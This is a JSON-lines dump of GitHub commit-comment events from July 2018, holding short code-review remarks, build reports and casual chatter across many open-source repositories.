{"id":"7920356092","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600239,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T23:37:00Z","updated_at":"2018-07-04T23:37:00Z","author_association":"MEMBER","body":"Thanks - I think I like what's going on there better - yes, somewhat breaking but also incremental "}},"created_at":"2018-07-04T23:37:00Z"}
{"id":"7920356122","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"erri120/wrye-bash"},"payload":{"comment":{"id":29600240,"position":22,"line":22,"path":"Mopy/bash/bosh/fomods.py","commit_id":"0d9ff3e7c730d8d5ece885be300398a062f6700a","created_at":"2018-07-04T23:37:01Z","updated_at":"2018-07-04T23:37:01Z","author_association":"NONE","body":"you need a with here - you never close the file"}},"created_at":"2018-07-04T23:37:01Z"}
{"id":"7920356440","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"erri120/wrye-bash"},"payload":{"comment":{"id":29600241,"position":28,"line":28,"path":"Mopy/bash/bosh/fomods.py","commit_id":"0d9ff3e7c730d8d5ece885be300398a062f6700a","created_at":"2018-07-04T23:37:12Z","updated_at":"2018-07-04T23:37:12Z","author_association":"NONE","body":"pass is not needed here"}},"created_at":"2018-07-04T23:37:12Z"}
{"id":"7920357878","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"erri120/wrye-bash"},"payload":{"comment":{"id":29600243,"position":null,"line":null,"path":null,"commit_id":"0d9ff3e7c730d8d5ece885be300398a062f6700a","created_at":"2018-07-04T23:38:12Z","updated_at":"2018-07-04T23:38:12Z","author_association":"NONE","body":"Left some random comments - take your time I will be rather busy myself"}},"created_at":"2018-07-04T23:38:12Z"}
{"id":"7920357946","type":"CommitCommentEvent","actor":{"login":"najibghadri"},"repo":{"name":"najibghadri/I-LIKE-TRAINS"},"payload":{"comment":{"id":29600244,"position":4,"line":4,"path":"ILIKETRAINS/src/graphics/CartDrawable.java","commit_id":"7aa7c4aab08562f50c46ba936ce4a2f236d19377","created_at":"2018-07-04T23:38:15Z","updated_at":"2018-07-04T23:38:15Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-04T23:38:15Z"}
{"id":"7920358323","type":"CommitCommentEvent","actor":{"login":"najibghadri"},"repo":{"name":"najibghadri/I-LIKE-TRAINS"},"payload":{"comment":{"id":29600245,"position":8,"line":8,"path":"ILIKETRAINS/src/graphics/CartDrawable.java","commit_id":"7aa7c4aab08562f50c46ba936ce4a2f236d19377","created_at":"2018-07-04T23:38:32Z","updated_at":"2018-07-04T23:38:32Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-04T23:38:32Z"}
{"id":"7920359090","type":"CommitCommentEvent","actor":{"login":"patricklauro"},"repo":{"name":"sensepost/mainframe_brute"},"payload":{"comment":{"id":29600246,"position":9,"line":9,"path":"applids.txt","commit_id":"ebea861281c7b13c351a12a135452524a0456c05","created_at":"2018-07-04T23:39:07Z","updated_at":"2018-07-04T23:39:07Z","author_association":"NONE","body":"kelsey_allaway@outlook.com\r\n"}},"created_at":"2018-07-04T23:39:07Z"}
{"id":"7920360106","type":"CommitCommentEvent","actor":{"login":"Aetherbane75"},"repo":{"name":"Aetherbane75/hello-world"},"payload":{"comment":{"id":29600248,"position":null,"line":null,"path":null,"commit_id":"5a28822bf874934f77bf4478db1a6385f343447f","created_at":"2018-07-04T23:39:51Z","updated_at":"2018-07-04T23:39:51Z","author_association":"OWNER","body":"okay, you're a goddamned idiot."}},"created_at":"2018-07-04T23:39:51Z"}
{"id":"7920362770","type":"CommitCommentEvent","actor":{"login":"portillaj"},"repo":{"name":"jasonportilla/law-dashboard"},"payload":{"comment":{"id":29600252,"position":null,"line":null,"path":null,"commit_id":"8287dd4176caacc083df678b143f17827a5fb123","created_at":"2018-07-04T23:41:43Z","updated_at":"2018-07-04T23:41:43Z","author_association":"CONTRIBUTOR","body":"Looks good.  We just have to edit when we have final colors and typography "}},"created_at":"2018-07-04T23:41:43Z"}
{"id":"7920363770","type":"CommitCommentEvent","actor":{"login":"kshal88"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29600254,"position":3,"line":90,"path":"Doc/bugs.rst","commit_id":"98ceece8f4cd797ec28078b6247529f01549687d","created_at":"2018-07-04T23:42:24Z","updated_at":"2018-07-04T23:42:24Z","author_association":"NONE","body":"clear"}},"created_at":"2018-07-04T23:42:24Z"}
{"id":"7920364609","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29600256,"position":null,"line":null,"path":null,"commit_id":"b2efddad1f164c9cb9d300484b172353c0ae4224","created_at":"2018-07-04T23:42:59Z","updated_at":"2018-07-04T23:42:59Z","author_association":"CONTRIBUTOR","body":"The weirdest thing here is that the player cells that get spawned as AI (your species, which have 100,100 for fear and aggression, chase other cells fine and rarely spin)"}},"created_at":"2018-07-04T23:42:59Z"}
{"id":"7920371674","type":"CommitCommentEvent","actor":{"login":"modulesio"},"repo":{"name":"webmixedreality/exokit-site"},"payload":{"comment":{"id":29600269,"position":null,"line":null,"path":null,"commit_id":"7ee471e7eaa70b1be316ba7861b5dab950322d9f","created_at":"2018-07-04T23:47:47Z","updated_at":"2018-07-04T23:47:47Z","author_association":"MEMBER","body":"Looks like a good start!"}},"created_at":"2018-07-04T23:47:47Z"}
{"id":"7920373648","type":"CommitCommentEvent","actor":{"login":"wbraswell"},"repo":{"name":"jordansissel/fpm"},"payload":{"comment":{"id":29600271,"position":null,"line":null,"path":null,"commit_id":"9cf91f0a53bec557babcc79663eb2c7cf22969f2","created_at":"2018-07-04T23:49:10Z","updated_at":"2018-07-04T23:49:10Z","author_association":"CONTRIBUTOR","body":"Looks good, I'll give it a test when the time is right!"}},"created_at":"2018-07-04T23:49:10Z"}
{"id":"7920374143","type":"CommitCommentEvent","actor":{"login":"RyanSquared"},"repo":{"name":"hashbang/shell-server"},"payload":{"comment":{"id":29600272,"position":57,"line":92,"path":"ansible/tasks/ldap-nss/main.yml","commit_id":"a4c0219028c153e364f5f739492e944d8164058c","created_at":"2018-07-04T23:49:32Z","updated_at":"2018-07-04T23:49:32Z","author_association":"CONTRIBUTOR","body":"module ?"}},"created_at":"2018-07-04T23:49:32Z"}
{"id":"7920374939","type":"CommitCommentEvent","actor":{"login":"ErikIPU2"},"repo":{"name":"ErikIPU2/LifeSocial"},"payload":{"comment":{"id":29600275,"position":2,"line":1,"path":"public/jogo.html","commit_id":"18885a7e20ad25f12f20b0d2049bdbf925aed2d2","created_at":"2018-07-04T23:50:04Z","updated_at":"2018-07-04T23:50:04Z","author_association":"OWNER","body":"FEZ MESMO CARALHO"}},"created_at":"2018-07-04T23:50:04Z"}
{"id":"7920375387","type":"CommitCommentEvent","actor":{"login":"RyanSquared"},"repo":{"name":"hashbang/shell-server"},"payload":{"comment":{"id":29600276,"position":84,"line":112,"path":"ansible/tasks/ldap-nss/main.yml","commit_id":"a4c0219028c153e364f5f739492e944d8164058c","created_at":"2018-07-04T23:50:19Z","updated_at":"2018-07-04T23:50:19Z","author_association":"CONTRIBUTOR","body":"use_authok vs use_authtok ?"}},"created_at":"2018-07-04T23:50:19Z"}
{"id":"7920376909","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29600279,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T23:51:22Z","updated_at":"2018-07-04T23:51:22Z","author_association":"CONTRIBUTOR","body":"other expression**s** 🤔 \r\n\r\nLooking at javadoc of SIMPLE would be better: \r\nhttps://github.com/SkriptLang/Skript/blob/8c26dca2f0520bbac0e1817c8af58229b1a05669/src/main/java/ch/njol/skript/lang/ExpressionType.java#L28-L30\r\nYeah this comfirms how you used it. Maybe fault of the javadocs. But Njol himself used them in the way i say, the current expressions does that too, also Snow said it should be in the way i say. And \"combined\" in English?"}},"created_at":"2018-07-04T23:51:22Z"}
{"id":"7920377277","type":"CommitCommentEvent","actor":{"login":"jarveson"},"repo":{"name":"jarveson/rpcs3"},"payload":{"comment":{"id":29600280,"position":null,"line":null,"path":null,"commit_id":"5f4455eff7a08aec1481d7842fd3079deb20dca1","created_at":"2018-07-04T23:51:39Z","updated_at":"2018-07-04T23:51:39Z","author_association":"OWNER","body":"Ask a dumb question, get a dumb response, what are you expecting?"}},"created_at":"2018-07-04T23:51:39Z"}
{"id":"7920378297","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29600282,"position":null,"line":null,"path":null,"commit_id":"f0a63305c4d6aef6a827cefd6a1d2ba5227ddc91","created_at":"2018-07-04T23:52:24Z","updated_at":"2018-07-04T23:52:24Z","author_association":"CONTRIBUTOR","body":"That breaks the preview images."}},"created_at":"2018-07-04T23:52:24Z"}
{"id":"7920379651","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/TADA-old"},"payload":{"comment":{"id":29600285,"position":null,"line":null,"path":null,"commit_id":"9ea233a36114dc6d4e252b706517d938e795e2fa","created_at":"2018-07-04T23:53:23Z","updated_at":"2018-07-04T23:53:23Z","author_association":"OWNER","body":":+1: "}},"created_at":"2018-07-04T23:53:23Z"}
{"id":"7920380033","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29600287,"position":null,"line":null,"path":null,"commit_id":"b2efddad1f164c9cb9d300484b172353c0ae4224","created_at":"2018-07-04T23:53:42Z","updated_at":"2018-07-04T23:53:42Z","author_association":"CONTRIBUTOR","body":"Ahh well, i fixed one bug, i'm sure i can fix this one too :P"}},"created_at":"2018-07-04T23:53:42Z"}
{"id":"7920385443","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29600299,"position":null,"line":null,"path":null,"commit_id":"8487fde5828f833701634a27ca82613e4f799afa","created_at":"2018-07-04T23:57:39Z","updated_at":"2018-07-04T23:57:39Z","author_association":"OWNER","body":"Automatic build report for commit 8487fde5828f833701634a27ca82613e4f799afa:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-9.95-brightgreen.svg)](#)\n"}},"created_at":"2018-07-04T23:57:39Z"}
{"id":"7920385509","type":"CommitCommentEvent","actor":{"login":"bigopon"},"repo":{"name":"fkleuver/experiment"},"payload":{"comment":{"id":29600300,"position":18,"line":18,"path":"src/runtime/resources/array-repeater.ts","commit_id":"3560478969b32108dd9e6bccda6191b6ae3da229","created_at":"2018-07-04T23:57:42Z","updated_at":"2018-07-04T23:57:42Z","author_association":"NONE","body":"Very nice intention, how will immediate and batched subscription play together in this repeater context ?"}},"created_at":"2018-07-04T23:57:42Z"}
{"id":"7920387005","type":"CommitCommentEvent","actor":{"login":"latosala"},"repo":{"name":"latosala/fundamentosHTML_Lautaro_Salaverry"},"payload":{"comment":{"id":29600302,"position":null,"line":null,"path":null,"commit_id":"f20aef23f0ef6a7e4531ea7fbca69cb3857e2499","created_at":"2018-07-04T23:58:50Z","updated_at":"2018-07-04T23:58:50Z","author_association":"OWNER","body":"\r\n[FundamentosHTML_Lautaro_Salaverry.zip](https://github.com/latosala/fundamentosHTML_Lautaro_Salaverry/files/2164525/FundamentosHTML_Lautaro_Salaverry.zip)\r\n\r\n"}},"created_at":"2018-07-04T23:58:50Z"}
{"id":"7915975369","type":"CommitCommentEvent","actor":{"login":"koomg9599"},"repo":{"name":"koomg9599/Sinbaram_18Summer_Algo"},"payload":{"comment":{"id":29589355,"position":1,"line":1,"path":"KMG/20180702/ReadMe","commit_id":"a6bf5ebb63a0fdcd6f226b6ec60d2ed9d49ef978","created_at":"2018-07-04T03:00:28Z","updated_at":"2018-07-04T03:00:28Z","author_association":"OWNER","body":"Brute Force"}},"created_at":"2018-07-04T03:00:28Z"}
{"id":"7915981638","type":"CommitCommentEvent","actor":{"login":"Scottmitch"},"repo":{"name":"netty/netty"},"payload":{"comment":{"id":29589373,"position":32,"line":1037,"path":"transport-native-unix-common/src/main/c/netty_unix_socket.c","commit_id":"7f5e77484caa05504b4e6c4527ac7bf1732d01c8","created_at":"2018-07-04T03:02:46Z","updated_at":"2018-07-04T03:02:46Z","author_association":"MEMBER","body":"@normanmaurer - `nettyClassName` was freed above, and is used here."}},"created_at":"2018-07-04T03:02:46Z"}
{"id":"7915984523","type":"CommitCommentEvent","actor":{"login":"dsonet"},"repo":{"name":"quasarframework/quasar"},"payload":{"comment":{"id":29589382,"position":4,"line":31,"path":"build/webpack.ssr.client.js","commit_id":"1e54165ec0ae94e55b90eb85a4590aad9a93d16e","created_at":"2018-07-04T03:04:00Z","updated_at":"2018-07-04T03:04:00Z","author_association":"NONE","body":"The old VUE_ENV is actually better."}},"created_at":"2018-07-04T03:04:00Z"}
{"id":"7915989111","type":"CommitCommentEvent","actor":{"login":"aranhoide"},"repo":{"name":"getlantern/borda-clj"},"payload":{"comment":{"id":29589385,"position":5,"line":29,"path":"src/borda_clj/client.clj","commit_id":"cc77b0ba02500ed22423741fb16eb00a22902944","created_at":"2018-07-04T03:05:56Z","updated_at":"2018-07-04T03:05:56Z","author_association":"CONTRIBUTOR","body":"@oxtoacart if we have already discarded some data then `measurements` will contain `submit-key` already, and its associated value doesn't have a `:_submits` so this will cause a NullPointerException.  We need to either filter out the `submit-key` entry from `measurements` or (probably easier, but more likely to mask bugs) get the `:_submits` with a default of 0.\r\n\r\nI suggest using the following (using the `->>` macro to reduce nesting).\r\n\r\n```clojure\r\n{:success_count (->> (dissoc measurements submit-key)\r\n                                                                     vals\r\n                                                                     (map :_submits)\r\n                                                                     (reduce +))}\r\n```"}},"created_at":"2018-07-04T03:05:56Z"}
{"id":"7915989881","type":"CommitCommentEvent","actor":{"login":"Lylist"},"repo":{"name":"Lylist/babysleep-beta"},"payload":{"comment":{"id":29589387,"position":null,"line":null,"path":null,"commit_id":"70eaeae2ae9d58f5b38c224d1e439382610438d8","created_at":"2018-07-04T03:06:16Z","updated_at":"2018-07-04T03:06:16Z","author_association":"OWNER","body":"模板"}},"created_at":"2018-07-04T03:06:16Z"}
{"id":"7915991754","type":"CommitCommentEvent","actor":{"login":"yangke687"},"repo":{"name":"yangke687/react-cnode-teach"},"payload":{"comment":{"id":29589390,"position":null,"line":null,"path":null,"commit_id":"ca52ea37463ded5198131b2fc4d4f1aee2fe93f4","created_at":"2018-07-04T03:07:02Z","updated_at":"2018-07-04T03:07:02Z","author_association":"OWNER","body":"webpack.server.config.js 里配置 externals, 是为了不让mobx每一次被重复打包"}},"created_at":"2018-07-04T03:07:02Z"}
{"id":"7915992713","type":"CommitCommentEvent","actor":{"login":"Bill0106"},"repo":{"name":"Bill0106/site-backend"},"payload":{"comment":{"id":29589391,"position":16,"line":16,"path":"service/game.go","commit_id":"4669fc9fa963b21646284b7c830e3fbac0b382f1","created_at":"2018-07-04T03:07:26Z","updated_at":"2018-07-04T03:07:26Z","author_association":"OWNER","body":"我现在的结构上已经按模块拆分了，每个模块暴露出routes，然后到了main里面再合在一起输出就好了"}},"created_at":"2018-07-04T03:07:26Z"}
{"id":"7915998050","type":"CommitCommentEvent","actor":{"login":"TrAnZiT21"},"repo":{"name":"Listcord/Listcord.js"},"payload":{"comment":{"id":29589410,"position":null,"line":null,"path":null,"commit_id":"74e7e8486c4b2da26e22cb3dbf9bc89c93da7f51","created_at":"2018-07-04T03:09:46Z","updated_at":"2018-07-04T03:09:46Z","author_association":"NONE","body":"fixed"}},"created_at":"2018-07-04T03:09:46Z"}
{"id":"7916009080","type":"CommitCommentEvent","actor":{"login":"bwychenyi"},"repo":{"name":"bwychenyi/example2"},"payload":{"comment":{"id":29589438,"position":2,"line":2,"path":"README.md","commit_id":"4ded2c9bf063583c14dc999c7149ac53eede7516","created_at":"2018-07-04T03:14:14Z","updated_at":"2018-07-04T03:14:14Z","author_association":"OWNER","body":"就讀"}},"created_at":"2018-07-04T03:14:14Z"}
{"id":"7916009479","type":"CommitCommentEvent","actor":{"login":"aranhoide"},"repo":{"name":"getlantern/borda-clj"},"payload":{"comment":{"id":29589439,"position":43,"line":25,"path":"src/borda_clj/client.clj","commit_id":"22a3a51b4327af804c294c85dfb4145206a929d2","created_at":"2018-07-04T03:14:24Z","updated_at":"2018-07-04T03:14:24Z","author_association":"CONTRIBUTOR","body":"This is my own bug, but when we close the `kill-ch`, the flushing goroutine will try and flush any remaining measurements.  Since we've exited this go-loop, they will block forever trying to read from `measurements-ch`.  We can't just `recur` here either because the closed `report-ch` will get selected immediately every time, so this would be a busy loop.  What we need to do is to send the measurements one last time: `(do (close! kill-ch) (>! measurements-ch measurements))`.  We'll need to add `>!` to the list of `:refer`red names from core.async.\r\n\r\nI've fixed both bugs in my `spec` branch, which otherwise doesn't add any active code, so I'll just do a PR from that one."}},"created_at":"2018-07-04T03:14:24Z"}
{"id":"7916009964","type":"CommitCommentEvent","actor":{"login":"sophia-cg"},"repo":{"name":"CognizantGrads-TeamALT/grizzly-frontend"},"payload":{"comment":{"id":29589440,"position":14,"line":328,"path":"src/App.css","commit_id":"e8bf017925615756c1b48c038030732a9c51afee","created_at":"2018-07-04T03:14:37Z","updated_at":"2018-07-04T03:14:37Z","author_association":"CONTRIBUTOR","body":"You've broken the css with these comments left (from git I'm assuming)"}},"created_at":"2018-07-04T03:14:37Z"}
{"id":"7916010232","type":"CommitCommentEvent","actor":{"login":"sophia-cg"},"repo":{"name":"CognizantGrads-TeamALT/grizzly-frontend"},"payload":{"comment":{"id":29589442,"position":6,"line":321,"path":"src/App.css","commit_id":"e8bf017925615756c1b48c038030732a9c51afee","created_at":"2018-07-04T03:14:44Z","updated_at":"2018-07-04T03:14:44Z","author_association":"CONTRIBUTOR","body":"Same here"}},"created_at":"2018-07-04T03:14:44Z"}
{"id":"7916010435","type":"CommitCommentEvent","actor":{"login":"yunarta"},"repo":{"name":"dennisweissmann/DeviceKit"},"payload":{"comment":{"id":29589443,"position":null,"line":null,"path":null,"commit_id":"26c8721dadb2c50b24ad859d6728f32f12ec2f53","created_at":"2018-07-04T03:14:51Z","updated_at":"2018-07-04T03:14:51Z","author_association":"NONE","body":"On Xcode 9.4.1, I had to use UIAccessibilityIsGuidedAccessEnabled() to make it work.\r\nNot sure about Xcode 10 beta."}},"created_at":"2018-07-04T03:14:51Z"}
{"id":"7916010656","type":"CommitCommentEvent","actor":{"login":"michaelcmartin"},"repo":{"name":"michaelcmartin/bumbershoot"},"payload":{"comment":{"id":29589444,"position":null,"line":null,"path":null,"commit_id":"f5b46003feeb670a0e6a07022a6718db95cbf6aa","created_at":"2018-07-04T03:14:57Z","updated_at":"2018-07-04T03:14:57Z","author_association":"OWNER","body":"Glad you enjoyed it! This program was part of a longer article about type-in programs generally, at https://bumbershootsoft.wordpress.com/2017/07/04/4th-of-july-special-type-in-programs/ - I'm somewhat unkind to the C64 edition of this compared to the PCjr one, but even at this distance, Bresenham's Algorithm in seven lines of BASIC is an impressive feat."}},"created_at":"2018-07-04T03:14:57Z"}
{"id":"7916016749","type":"CommitCommentEvent","actor":{"login":"chongiscool"},"repo":{"name":"udacity/reactnd-udacimeals-complete"},"payload":{"comment":{"id":29589455,"position":21,"line":21,"path":"src/components/App.js","commit_id":"e01aeaf5719ab83cb4af8bf6aa944148335122f9","created_at":"2018-07-04T03:17:30Z","updated_at":"2018-07-04T03:17:30Z","author_association":"NONE","body":"Is ```Object.keys(calendar[day])``` return a object? If so,  this object should be ``` {  breakfast: null, lunch: null, dinner: null, } ```,  is **reduce()** a array function? I am confused this gist code, can anyone explain it, thx. \r\n\r\n"}},"created_at":"2018-07-04T03:17:30Z"}
{"id":"7916023127","type":"CommitCommentEvent","actor":{"login":"jlevy"},"repo":{"name":"jlevy/atom-flowmark"},"payload":{"comment":{"id":29589470,"position":18,"line":219,"path":"tests/testdoc.flowmark.md","commit_id":"43faf8f3da388a40791335eb4d78341bfb17bc59","created_at":"2018-07-04T03:20:15Z","updated_at":"2018-07-04T03:20:15Z","author_association":"OWNER","body":"#10 "}},"created_at":"2018-07-04T03:20:15Z"}
{"id":"7916042527","type":"CommitCommentEvent","actor":{"login":"Evgenus20"},"repo":{"name":"Evgenus20/My_second_repository"},"payload":{"comment":{"id":29589492,"position":3,"line":3,"path":"README.md","commit_id":"97012eadd830850ee42bc833089ee0994a4c4db3","created_at":"2018-07-04T03:28:20Z","updated_at":"2018-07-04T03:28:20Z","author_association":"OWNER","body":"sf"}},"created_at":"2018-07-04T03:28:20Z"}
{"id":"7916042878","type":"CommitCommentEvent","actor":{"login":"Evgenus20"},"repo":{"name":"Evgenus20/My_second_repository"},"payload":{"comment":{"id":29589494,"position":2,"line":2,"path":"README.md","commit_id":"97012eadd830850ee42bc833089ee0994a4c4db3","created_at":"2018-07-04T03:28:31Z","updated_at":"2018-07-04T03:28:31Z","author_association":"OWNER","body":"sdf"}},"created_at":"2018-07-04T03:28:31Z"}
{"id":"7916043090","type":"CommitCommentEvent","actor":{"login":"Evgenus20"},"repo":{"name":"Evgenus20/My_second_repository"},"payload":{"comment":{"id":29589495,"position":2,"line":2,"path":"README.md","commit_id":"97012eadd830850ee42bc833089ee0994a4c4db3","created_at":"2018-07-04T03:28:37Z","updated_at":"2018-07-04T03:28:37Z","author_association":"OWNER","body":"sdf"}},"created_at":"2018-07-04T03:28:37Z"}
{"id":"7916044066","type":"CommitCommentEvent","actor":{"login":"comeriven"},"repo":{"name":"zuiidea/antd-admin"},"payload":{"comment":{"id":29589498,"position":null,"line":null,"path":null,"commit_id":"dbcc90e7ad9b7155c4e81fa272ab104299330a76","created_at":"2018-07-04T03:29:00Z","updated_at":"2018-07-04T03:29:00Z","author_association":"NONE","body":"hey，烧烤吃完了吗？"}},"created_at":"2018-07-04T03:29:00Z"}
{"id":"7916048635","type":"CommitCommentEvent","actor":{"login":"Scottmitch"},"repo":{"name":"netty/netty"},"payload":{"comment":{"id":29589505,"position":32,"line":1037,"path":"transport-native-unix-common/src/main/c/netty_unix_socket.c","commit_id":"7f5e77484caa05504b4e6c4527ac7bf1732d01c8","created_at":"2018-07-04T03:30:49Z","updated_at":"2018-07-04T03:30:49Z","author_association":"MEMBER","body":"see https://github.com/netty/netty/pull/8099"}},"created_at":"2018-07-04T03:30:49Z"}
{"id":"7916053182","type":"CommitCommentEvent","actor":{"login":"charleen143"},"repo":{"name":"githubsaturn/captainduckduck"},"payload":{"comment":{"id":29589512,"position":8,"line":8,"path":"docs/To-Be-Converted/Deployment-Methods.md","commit_id":"68ea890d3ee34de67f0988971efea4c289db30df","created_at":"2018-07-04T03:32:49Z","updated_at":"2018-07-04T03:32:49Z","author_association":"NONE","body":"I know"}},"created_at":"2018-07-04T03:32:49Z"}
{"id":"7916059044","type":"CommitCommentEvent","actor":{"login":"qinguanglin381199311"},"repo":{"name":"qinguanglin381199311/AutoTestJava"},"payload":{"comment":{"id":29589522,"position":null,"line":null,"path":null,"commit_id":"70c71c3ff3f246591c3edc7ac5fadcc6d83f64db","created_at":"2018-07-04T03:35:24Z","updated_at":"2018-07-04T03:35:24Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/18528291/42255438-52510ff6-7f7e-11e8-9af4-83c3f17463ef.png)\r\n"}},"created_at":"2018-07-04T03:35:24Z"}
{"id":"7916059825","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29589523,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-04T03:35:44Z","updated_at":"2018-07-04T03:35:44Z","author_association":"NONE","body":"Combined patches may perform very differently than simply the sum of their individual results.  We already observe this frequently with [0, 4] combos: rarely do a +1 Elo change and a +1 Elo change combine to produce +2 Elo.  They could produce a small gain, no gain, a regression...or could combine to be worth, e.g., +5 Elo.  We don't know until we test, so we test.\r\n\r\nIn the presence of strong positive interactions between the constituent changes, the main effect comes from the interaction, something categorically different from the original two patches.  They are not separable.\r\n\r\nThat is why I find @locutus2's proposal of combo [0, 5] tests with stricter bounds (and of course, a limited number of combinations, as in current [0, 4]s) to be so interesting.  \r\n\r\nConsider an artificial case, as favorable as possible to the idea of a combo [0, 5]:\r\n* We have two [0, 5] tests that pass STC and fail yellow at LTC after very long runs.\r\n* They are both small changes, e.g., 1-3 lines, so the combined patch does not add much more complexity than a typical [0, 5] would.\r\n* They both concern similar concepts, e.g., both are changes to passed pawn evaluation.\r\n* After running the combo tests, the estimated Elo gains are large at both STC and LTC.\r\n\r\nThe question is: should this be committed?\r\n\r\nOf course, I do not claim to speak for @locutus2, but I find his idea fascinating and only hope to see it discussed.  I'm grateful to everyone for their time and consideration--it's a privilege to work with you."}},"created_at":"2018-07-04T03:35:44Z"}
{"id":"7916062015","type":"CommitCommentEvent","actor":{"login":"qinguanglin381199311"},"repo":{"name":"qinguanglin381199311/AutoTestJava"},"payload":{"comment":{"id":29589526,"position":null,"line":null,"path":null,"commit_id":"70c71c3ff3f246591c3edc7ac5fadcc6d83f64db","created_at":"2018-07-04T03:36:42Z","updated_at":"2018-07-04T03:36:42Z","author_association":"OWNER","body":"\r\n![image](https://user-images.githubusercontent.com/18528291/42255471-82f4d6ba-7f7e-11e8-8555-25978b94fe5a.png)\r\n"}},"created_at":"2018-07-04T03:36:42Z"}
{"id":"7916063258","type":"CommitCommentEvent","actor":{"login":"qinguanglin381199311"},"repo":{"name":"qinguanglin381199311/AutoTestJava"},"payload":{"comment":{"id":29589528,"position":null,"line":null,"path":null,"commit_id":"70c71c3ff3f246591c3edc7ac5fadcc6d83f64db","created_at":"2018-07-04T03:37:15Z","updated_at":"2018-07-04T03:37:15Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/18528291/42255484-96085c68-7f7e-11e8-89a7-3a75966e2226.png)\r\n"}},"created_at":"2018-07-04T03:37:15Z"}
{"id":"7916064337","type":"CommitCommentEvent","actor":{"login":"qinguanglin381199311"},"repo":{"name":"qinguanglin381199311/AutoTestJava"},"payload":{"comment":{"id":29589530,"position":null,"line":null,"path":null,"commit_id":"70c71c3ff3f246591c3edc7ac5fadcc6d83f64db","created_at":"2018-07-04T03:37:46Z","updated_at":"2018-07-04T03:37:46Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/18528291/42255494-a2e04f0e-7f7e-11e8-9860-c1fedb78167d.png)\r\n"}},"created_at":"2018-07-04T03:37:46Z"}
{"id":"7916067701","type":"CommitCommentEvent","actor":{"login":"joshuaalm"},"repo":{"name":"joshuaalm/windows-driver-docs"},"payload":{"comment":{"id":29589536,"position":null,"line":null,"path":null,"commit_id":"a15a037da2372777638e026be82061b15d91c431","created_at":"2018-07-04T03:39:17Z","updated_at":"2018-07-04T03:39:17Z","author_association":"OWNER","body":"Changed to reflect MS docs presence on the web"}},"created_at":"2018-07-04T03:39:17Z"}
{"id":"7916071243","type":"CommitCommentEvent","actor":{"login":"onpon4"},"repo":{"name":"kotc-game/kotc"},"payload":{"comment":{"id":29589539,"position":null,"line":null,"path":null,"commit_id":"b8c52b227dcb4a703f0d847513e0c55fa630cebc","created_at":"2018-07-04T03:40:49Z","updated_at":"2018-07-04T03:40:49Z","author_association":"COLLABORATOR","body":"The card generator idea is one that I like. I haven't done it thus far out of concern for maintenance burden, but come to think of it, there's a detailed way to modify and remove texts now, so it shouldn't be a problem. The hard part would just be putting the interface together, plus getting all the text and stuff on there properly. So I could do it, but it would be a huge time investment and so I'd have to wait to do that until my other current projects (especially Hexoshi) are out of the way. The same goes for making a digital version of the game, by the way, so I would probably make the card generator just a feature of the digital version (with an option to export cards).\r\n\r\nI can't do the verification app you suggest, partly because I'm not familiar with Android programming and partly because, as you bring up, there are no libre image-to-text libraries (or at least none that I'm aware of). I only develop and recommend libre software as a matter of principle, so a proprietary library would be unacceptable for an official KotC app. I can't and wouldn't stop anyone else from doing so, however. If a libre library that could be used does come to light, then maybe I could take a look into it, but it would have to wait until after the digital version of KotC (so also after my current ongoing projects, esp. Hexoshi).\r\n\r\nThe rarity idea is definitely not something I'm going to be doing. Limiting the number of such cards can help (or rather, would be essential; otherwise everyone would just use all rare cards), but the possible benefit is so minuscule that I don't think it justifies the increase in complexity (where you have to include X \"rare\" cards or your deck is objectively weaker than it could be)."}},"created_at":"2018-07-04T03:40:49Z"}
{"id":"7916071289","type":"CommitCommentEvent","actor":{"login":"yfujii01"},"repo":{"name":"yfujii01/test"},"payload":{"comment":{"id":29589540,"position":110,"line":250,"path":"EV3/app.cpp","commit_id":"f85aafdc9963ba4b99eaaa32577e2e75c9d21bd9","created_at":"2018-07-04T03:40:50Z","updated_at":"2018-07-04T03:40:50Z","author_association":"OWNER","body":"この時のforwardの値は？\r\n変更前は30だったぽい"}},"created_at":"2018-07-04T03:40:50Z"}
{"id":"7916075207","type":"CommitCommentEvent","actor":{"login":"pmbohm"},"repo":{"name":"aodn/geoserver-build"},"payload":{"comment":{"id":29589544,"position":92,"line":139,"path":"src/extension/wps/src/main/java/au/org/emii/wps/GoGoDuckProcess.java","commit_id":"d69752c7d9b067402793018c7905a7b86f72eeb4","created_at":"2018-07-04T03:42:33Z","updated_at":"2018-07-04T03:42:33Z","author_association":"MEMBER","body":"absolutamente!\r\n"}},"created_at":"2018-07-04T03:42:33Z"}
